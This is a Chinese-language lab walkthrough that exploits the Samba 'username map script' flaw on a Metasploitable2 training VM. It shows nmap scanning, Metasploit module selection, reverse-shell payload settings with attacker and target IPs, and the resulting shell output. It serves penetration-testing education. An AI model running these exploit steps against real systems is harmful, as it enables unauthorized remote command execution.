产生原因
传递通过MS-RPC提供的未过滤的用户输入在调用定义的外部脚本时调用/bin/sh,在smb.conf中,导致允许远程命令执行
实验环境
这里使用的目标机是metasploitable2
linux攻击机:192.168.43.113
linux目标机:192.168.43.23
利用攻击
首先对目标机进行扫描,收集可用的服务信息,使用nmap扫描查看系统开放端口和相关的应用程序
msf5 > nmap -sV 192.168.43.23
[*] exec: nmap -sV 192.168.43.23
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-02 22:22 CST
Nmap scan report for 192.168.43.23
Host is up (0.0012s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec?
513/tcp open login?
514/tcp open shell?
1099/tcp open rmiregistry GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
8009/tcp open ajp13?
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port514-TCP:V=7.70%I=7%D=9/2%Time=5F4FAAAA%P=x86_64-pc-linux-gnu%r(NULL
SF:,2B,"\x01Couldn't\x20get\x20address\x20for\x20your\x20host\x20\(kali\)\SF:n");
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect resultsat https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 130.39 seconds
可以看到目标机开着Samba 3.x服务,通过search samba 3.x来找到利用模块
msf5 > search samba 3.x
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 auxiliary/admin/http/intersil_pass_reset 2007-09-10 normal Yes Intersil (Boa) HTTPd Basic Authentication Password Reset
2 auxiliary/admin/smb/samba_symlink_traversal normal No Samba Symlink Directory Traversal
3 auxiliary/dos/samba/lsa_addprivs_heap normal No Samba lsa_io_privilege_set Heap Overflow
4 auxiliary/dos/samba/lsa_transnames_heap normal No Samba lsa_io_trans_names Heap Overflow
5 auxiliary/dos/samba/read_nttrans_ea_list normal No Samba read_nttrans_ea_list Integer Overflow
6 auxiliary/scanner/rsync/modules_list normal Yes List Rsync Modules
7 auxiliary/scanner/smb/smb_uninit_cred normal Yes Samba _netr_ServerPasswordSet Uninitialized Credential State
8 auxiliary/scanner/ssh/eaton_xpert_backdoor 2018-07-18 normal Yes Eaton Xpert Meter SSH Private Key Exposure Scanner
9 exploit/freebsd/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (*BSD x86)
10 exploit/linux/http/efw_chpasswd_exec 2015-06-28 excellent No Endian Firewall Proxy Password Change Command Injection
11 exploit/linux/http/imperva_securesphere_exec 2018-10-08 excellent Yes Imperva SecureSphere PWS Command Injection
12 exploit/linux/http/zenoss_showdaemonxmlconfig_exec 2012-07-30 good Yes Zenoss 3 showDaemonXMLConfig Command Execution
13 exploit/linux/samba/chain_reply 2010-06-16 good No Samba chain_reply Memory Corruption (Linux x86)
14 exploit/linux/samba/is_known_pipename 2017-03-24 excellent Yes Samba is_known_pipename() Arbitrary Module Load
15 exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Yes Samba lsa_io_trans_names Heap Overflow
16 exploit/linux/samba/setinfopolicy_heap 2012-04-10 normal Yes Samba SetInformationPolicy AuditEventsInfo Heap Overflow
17 exploit/linux/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Linux x86)
18 exploit/multi/http/joomla_http_header_rce 2015-12-14 excellent Yes Joomla HTTP Header Unauthenticated Remote Code Execution
19 exploit/multi/http/plone_popen2 2011-10-04 excellent Yes Plone and Zope XMLTools Remote Command Execution
20 exploit/multi/http/rails_xml_yaml_code_exec 2013-01-07 excellent No Ruby on Rails XML Processor YAML Deserialization Code Execution
21 exploit/multi/http/struts2_code_exec_showcase 2017-07-07 excellent Yes Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution
22 exploit/multi/http/struts_code_exec_classloader 2014-03-06 manual No Apache Struts ClassLoader Manipulation Remote Code Execution
23 exploit/multi/http/struts_default_action_mapper 2013-07-02 excellent Yes Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
24 exploit/multi/samba/nttrans 2003-04-07 average No Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
25 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
26 exploit/osx/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
27 exploit/osx/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Mac OS X PPC)
28 exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow
29 exploit/solaris/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Solaris SPARC)
30 exploit/unix/http/quest_kace_systems_management_rce 2018-05-31 excellent Yes Quest KACE Systems Management Command Injection
31 exploit/unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution
32 exploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Yes Citrix Access Gateway Command Execution
33 exploit/unix/webapp/joomla_akeeba_unserialize 2014-09-29 excellent Yes Joomla Akeeba Kickstart Unserialize Remote Code Execution
34 exploit/unix/webapp/joomla_contenthistory_sqli_rce 2015-10-23 excellent Yes Joomla Content History SQLi Remote Code Execution
35 exploit/unix/webapp/joomla_media_upload_exec 2013-08-01 excellent Yes Joomla Media Manager File Upload Vulnerability
36 exploit/unix/webapp/phpmyadmin_config 2009-03-24 excellent No PhpMyAdmin Config File Code Injection
37 exploit/windows/browser/awingsoft_web3d_bof 2009-07-10 average No AwingSoft Winds3D Player SceneURL Buffer Overflow
38 exploit/windows/fileformat/ms14_060_sandworm 2014-10-14 excellent No MS14-060 Microsoft Windows OLE Package Manager Code Execution
39 exploit/windows/http/apache_modjk_overflow 2007-03-02 great Yes Apache mod_jk 1.2.20 Buffer Overflow
40 exploit/windows/http/ia_webmail 2003-11-03 average No IA WebMail 3.x Buffer Overflow
41 exploit/windows/http/sambar6_search_results 2003-06-21 normal Yes Sambar 6 Search Results Buffer Overflow
42 exploit/windows/license/calicclnt_getconfig 2005-03-02 average No Computer Associates License Client GETCONFIG Overflow
43 exploit/windows/smb/group_policy_startup 2015-01-26 manual No Group Policy Script Execution From Shared Resource
44 post/linux/gather/enum_configs normal No Linux Gather Configurations
使用该漏洞利用模块,然后查看该漏洞利用模块下可供选择的攻击载荷模块
msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 cmd/unix/bind_awk normal No Unix Command Shell, Bind TCP (via AWK)
2 cmd/unix/bind_busybox_telnetd normal No Unix Command Shell, Bind TCP (via BusyBox telnetd)
3 cmd/unix/bind_inetd normal No Unix Command Shell, Bind TCP (inetd)
4 cmd/unix/bind_lua normal No Unix Command Shell, Bind TCP (via Lua)
5 cmd/unix/bind_netcat normal No Unix Command Shell, Bind TCP (via netcat)
6 cmd/unix/bind_netcat_gaping normal No Unix Command Shell, Bind TCP (via netcat -e)
7 cmd/unix/bind_netcat_gaping_ipv6 normal No Unix Command Shell, Bind TCP (via netcat -e) IPv6
8 cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl)
9 cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6
10 cmd/unix/bind_r normal No Unix Command Shell, Bind TCP (via R)
11 cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby)
12 cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6
13 cmd/unix/bind_socat_udp normal No Unix Command Shell, Bind UDP (via socat)
14 cmd/unix/bind_zsh normal No Unix Command Shell, Bind TCP (via Zsh)
15 cmd/unix/generic normal No Unix Command, Generic Command Execution
16 cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet)
17 cmd/unix/reverse_awk normal No Unix Command Shell, Reverse TCP (via AWK)
18 cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet)
19 cmd/unix/reverse_ksh normal No Unix Command Shell, Reverse TCP (via Ksh)
20 cmd/unix/reverse_lua normal No Unix Command Shell, Reverse TCP (via Lua)
21 cmd/unix/reverse_ncat_ssl normal No Unix Command Shell, Reverse TCP (via ncat)
22 cmd/unix/reverse_netcat normal No Unix Command Shell, Reverse TCP (via netcat)
23 cmd/unix/reverse_netcat_gaping normal No Unix Command Shell, Reverse TCP (via netcat -e)
24 cmd/unix/reverse_openssl normal No Unix Command Shell, Double Reverse TCP SSL (openssl)
25 cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl)
26 cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl)
27 cmd/unix/reverse_php_ssl normal No Unix Command Shell, Reverse TCP SSL (via php)
28 cmd/unix/reverse_python normal No Unix Command Shell, Reverse TCP (via Python)
29 cmd/unix/reverse_python_ssl normal No Unix Command Shell, Reverse TCP SSL (via python)
30 cmd/unix/reverse_r normal No Unix Command Shell, Reverse TCP (via R)
31 cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby)
32 cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby)
33 cmd/unix/reverse_socat_udp normal No Unix Command Shell, Reverse UDP (via socat)
34 cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet)
35 cmd/unix/reverse_zsh normal No Unix Command Shell, Reverse TCP (via Zsh)
设置cmd/unix/reverse反向攻击载荷模块
设置目标机IP地址
设置漏洞利用的端口号
设置发动攻击主机IP地址
msf5 exploit(multi/samba/usermap_script) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf5 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.43.23
RHOSTS => 192.168.43.23
msf5 exploit(multi/samba/usermap_script) > set RPORT 445
RPORT => 445
msf5 exploit(multi/samba/usermap_script) > set LHOST 192.168.43.113
LHOST => 192.168.43.113
msf5 exploit(multi/samba/usermap_script) > options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.43.23 yes The target address range or CIDR identifier
RPORT 445 yes The target port (TCP)
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.43.113 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
设置完成我们exploit或者run一下
msf5 exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP double handler on 192.168.43.113:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo oQwX81x659bJ0os8;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "oQwX81x659bJ0os8\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 4 opened (192.168.43.113:4444 -> 192.168.43.23:49794) at 2020-09-02 23:02:57 +0800
msf攻击成功后会获取目标主机的shell,为了验证该shell是目标机的,可以查询主机名、用户名和IP
ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:fa:dd:2a
inet addr:192.168.43.23 Bcast:192.168.43.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fefa:dd2a/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:2410 errors:0 dropped:0 overruns:0 frame:0
TX packets:1961 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:190106 (185.6 KB) TX bytes:138231 (134.9 KB)
Interrupt:17 Base address:0x2000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:278 errors:0 dropped:0 overruns:0 frame:0
TX packets:278 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:110249 (107.6 KB) TX bytes:110249 (107.6 KB)
可以看到命令已经执行了。
总结
总结:攻击五分钟,搭建两小时。又是朴实而又充实的一天啊!